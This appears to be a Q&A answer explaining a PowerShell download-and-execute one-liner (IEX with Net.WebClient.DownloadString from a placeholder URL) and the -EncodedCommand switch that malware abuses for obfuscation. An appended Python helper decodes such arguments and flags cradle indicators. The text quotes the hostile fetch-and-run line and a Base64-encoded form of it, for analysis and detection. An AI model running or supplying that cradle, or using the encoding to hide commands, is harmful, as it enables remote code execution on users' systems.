mklement0

As for the script:

IEX((New-Object Net.WebClient).DownloadString('https://example.org/xmpsdh')) downloads a string from the given URL and tries to execute it as a PowerShell command, via IEX, the built-in alias for the (generally to be avoided) Invoke-Expression cmdlet.

In other words: it downloads unknown PowerShell commands from a website and executes them.


As for the command line:

-e is short for the PowerShell CLI's -EncodedCommand parameter, which accepts commands as Base64-encoded strings.

The purpose of this parameter is to enable robust passing of complex command strings without running into problems with quoting and escaping.

However, malware uses the parameter as an obfuscation technique: you cannot easily tell what the command is doing.


Example:

# -e is short for -EncodedCommand
powershell -e RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA

is the equivalent of:

powershell -Command "Get-Date -Format yyyy"

You can decode a given Base64-encoded argument as follows:

$base64 = 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
# -> 'Get-Date -Format yyyy'
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64))

Conversely, if you want to Base64-encode a string for -EncodedCommand:

$command = 'Get-Date -Format yyyy'
# -> 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))
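An added example, not part of mklement0's answer: the same two transformations (UTF-16LE bytes in and out of Base64) written in Python as a small triage helper for process command lines, the way an analyst would apply the answer to logged `powershell -e ...` invocations. It recognises the abbreviated forms of -EncodedCommand (-e, -ec, -enc, ...; the assumption that any prefix of the parameter name is accepted, and that a leading `/` works like `-`, is mine), decodes the argument strictly the way [Convert]::FromBase64String would (malformed Base64 or an odd byte count is reported as an error rather than guessed at), and flags the substrings from the answer's download-and-execute one-liner in the decoded text. The sample command lines are constructed; the only real value in them is the Base64 string quoted in the answer.

```python
"""Triage helper for PowerShell -EncodedCommand arguments in process command lines.
Added example (not part of the original answer); the sample command lines are constructed."""
import base64
import binascii
from dataclasses import dataclass, field
from typing import List, Optional

# Base64 value quoted in the answer: 'Get-Date -Format yyyy' as UTF-16LE, then Base64.
PAGE_B64 = "RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA"

# Substrings from the answer's download-and-execute one-liner that are worth flagging
# when they appear in a decoded command (matched case-insensitively, in this order).
INDICATORS = ["iex", "invoke-expression", "net.webclient", "downloadstring"]


@dataclass
class Finding:
    cmdline: str
    encoded: Optional[str] = None   # the Base64 argument, if one was found
    decoded: Optional[str] = None   # the recovered command text
    error: Optional[str] = None     # why decoding failed, if it did
    indicators: List[str] = field(default_factory=list)


def encode_command(command: str) -> str:
    """Same transformation as [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(...))."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Same transformation as [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(...)).
    Strict on purpose: like FromBase64String, stray characters or bad padding are an error."""
    raw = base64.b64decode(b64, validate=True)  # raises binascii.Error on malformed input
    if len(raw) % 2:
        raise ValueError("odd byte count: -EncodedCommand payloads are UTF-16LE")
    return raw.decode("utf-16-le")


def is_encoded_command_switch(token: str) -> bool:
    """True for -e, -ec, -enc, -EncodedCommand and other prefixes of the parameter name.
    Assumption: powershell.exe accepts any prefix of 'encodedcommand' (so -ex is NOT this
    switch; it selects -ExecutionPolicy), and a leading '/' is treated like '-'."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    return "encodedcommand".startswith(token[1:].lower())


def find_encoded_argument(cmdline: str) -> Optional[str]:
    """Return the argument that follows the first -EncodedCommand-style switch, or None.
    Whitespace splitting is enough here: a Base64 argument never contains whitespace."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_command_switch(tok):
            return tokens[i + 1]
    return None


def analyze(cmdline: str) -> Finding:
    """Locate, decode and scan the encoded command of one process command line."""
    finding = Finding(cmdline=cmdline, encoded=find_encoded_argument(cmdline))
    if finding.encoded is None:
        return finding
    try:
        finding.decoded = decode_encoded_command(finding.encoded)
    except (binascii.Error, ValueError, UnicodeDecodeError) as exc:
        finding.error = f"{type(exc).__name__}: {exc}"
        return finding
    lowered = finding.decoded.lower()
    finding.indicators = [ind for ind in INDICATORS if ind in lowered]
    return finding


def triage(cmdlines: List[str]) -> List[Finding]:
    return [analyze(line) for line in cmdlines]


# Constructed sample command lines (not real telemetry). The second one wraps the
# answer's own download-and-execute script in -EncodedCommand, which is exactly the
# obfuscated form the answer warns about.
CRADLE = "IEX((New-Object Net.WebClient).DownloadString('https://example.org/xmpsdh'))"
SAMPLE_CMDLINES = [
    f"powershell -e {PAGE_B64}",
    f"powershell.exe -enc {encode_command(CRADLE)}",
    'powershell -ExecutionPolicy Bypass -Command "Get-Date -Format yyyy"',
    "powershell -EncodedCommand not_base64!",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        status = (f.error or f.decoded) if f.encoded else "(no encoded command)"
        print(f"{f.cmdline[:50]:<50} -> {status}  indicators={f.indicators}")
```

Run it as a script to see the four cases side by side: the answer's own example decodes to Get-Date -Format yyyy with nothing flagged, the encoded one-liner decodes back to the script with three indicators, the plain -Command invocation has no encoded argument at all, and the malformed Base64 is reported as an error instead of being silently skipped.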